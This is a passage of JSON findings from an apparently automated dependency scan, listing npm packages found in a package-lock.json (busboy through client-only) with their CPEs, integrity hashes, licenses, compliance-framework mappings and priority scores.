"ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e092abe833e5a95d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: busboy 1.6.0", "title": "busboy 1.6.0", "description": "Package discovered: busboy 1.6.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3009b8237fb85cf0", "name": "busboy", "version": "1.6.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:busboy:busboy:1.6.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/busboy@1.6.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz", "integrity": "sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA==", "dependencies": { "streamsearch": "^1.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "81eb78c52edce0ec", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: bytes 3.1.2", "title": "bytes 3.1.2", "description": "Package discovered: bytes 3.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f9a24c0655f5cc44", "name": "bytes", "version": "3.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:bytes:bytes:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/bytes@3.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz", "integrity": "sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a35927eb13a2081e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: call-bind-apply-helpers 1.0.2", "title": "call-bind-apply-helpers 1.0.2", "description": "Package discovered: call-bind-apply-helpers 1.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2303cf02934afa6a", "name": "call-bind-apply-helpers", "version": "1.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:call-bind-apply-helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call-bind-apply-helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call_bind_apply_helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call_bind_apply_helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call-bind-apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call-bind-apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call_bind_apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call_bind_apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call-bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call-bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call_bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call_bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/call-bind-apply-helpers@1.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", "dependencies": { "es-errors": "^1.3.0", "function-bind": "^1.1.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4e5277c95313e881", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: call-bound 1.0.4", "title": "call-bound 1.0.4", "description": "Package discovered: call-bound 1.0.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "23c8e695a4ffce79", "name": "call-bound", "version": "1.0.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:call-bound:call-bound:1.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call-bound:call_bound:1.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call_bound:call-bound:1.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call_bound:call_bound:1.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call:call-bound:1.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:call:call_bound:1.0.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/call-bound@1.0.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/call-bound/-/call-bound-1.0.4.tgz", "integrity": "sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg==", "dependencies": { "call-bind-apply-helpers": "^1.0.2", "get-intrinsic": "^1.3.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a4cb8d0a4eb7503f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: camelcase 5.3.1", "title": "camelcase 5.3.1", "description": "Package discovered: camelcase 5.3.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "98453e2c1718f20f", "name": "camelcase", "version": "5.3.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:camelcase:camelcase:5.3.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/camelcase@5.3.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3b9efee290bbc139", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: camelcase-css 2.0.1", "title": "camelcase-css 2.0.1", "description": "Package discovered: camelcase-css 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b224930ed183bceb", "name": "camelcase-css", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:camelcase-css:camelcase-css:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:camelcase-css:camelcase_css:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:camelcase_css:camelcase-css:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:camelcase_css:camelcase_css:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:camelcase:camelcase-css:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:camelcase:camelcase_css:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/camelcase-css@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/camelcase-css/-/camelcase-css-2.0.1.tgz", "integrity": "sha512-QOSvevhslijgYwRx6Rv7zKdMF8lbRmx+uQGx2+vDc+KI/eBnsy9kit5aj23AgGu3pa4t9AgwbnXWqS+iOY+2aA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "54ace4d8b29c3fad", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: caniuse-lite 1.0.30001791", "title": "caniuse-lite 1.0.30001791", "description": "Package discovered: caniuse-lite 1.0.30001791", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "574728aff770dffd", "name": "caniuse-lite", "version": "1.0.30001791", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "CC-BY-4.0", "spdxExpression": "CC-BY-4.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:caniuse-lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:caniuse-lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:caniuse_lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:caniuse_lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:caniuse:caniuse-lite:1.0.30001791:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:caniuse:caniuse_lite:1.0.30001791:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/caniuse-lite@1.0.30001791", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001791.tgz", "integrity": "sha512-yk0l/YSrOnFZk3UROpDLQD9+kC1l4meK/wed583AXrzoarMGJcbRi2Q4RaUYbKxYAsZ8sWmaSa/DsLmdBeI1vQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d2ccf1883f8178ec", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: chokidar 3.6.0", "title": "chokidar 3.6.0", "description": "Package discovered: chokidar 3.6.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e6e064efe5c17d2c", "name": "chokidar", "version": "3.6.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:chokidar:chokidar:3.6.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/chokidar@3.6.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/chokidar/-/chokidar-3.6.0.tgz", "integrity": "sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw==", "dependencies": { "anymatch": "~3.1.2", "braces": "~3.0.2", "glob-parent": "~5.1.2", "is-binary-path": "~2.1.0", "is-glob": "~4.0.1", "normalize-path": "~3.0.0", "readdirp": "~3.6.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "265715c369a6ec46", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: client-only 0.0.1", "title": "client-only 0.0.1", "description": "Package discovered: client-only 0.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e7be86c370ee2217", "name": "client-only", "version": "0.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:client-only:client-only:0.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:client-only:client_only:0.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:client_only:client-only:0.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:client_only:client_only:0.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:client:client-only:0.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:client:client_only:0.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/client-only@0.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/client-only/-/client-only-0.0.1.tgz", "integrity": "sha512-IV3Ou0jSMzZrd3pZ48nLkT9DA7Ag1pnPzaiQhpW7c3RbcqqzvzzVu+L8gfqMp/8IM2MQtSiqaCxrrcfu8I8rMA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": 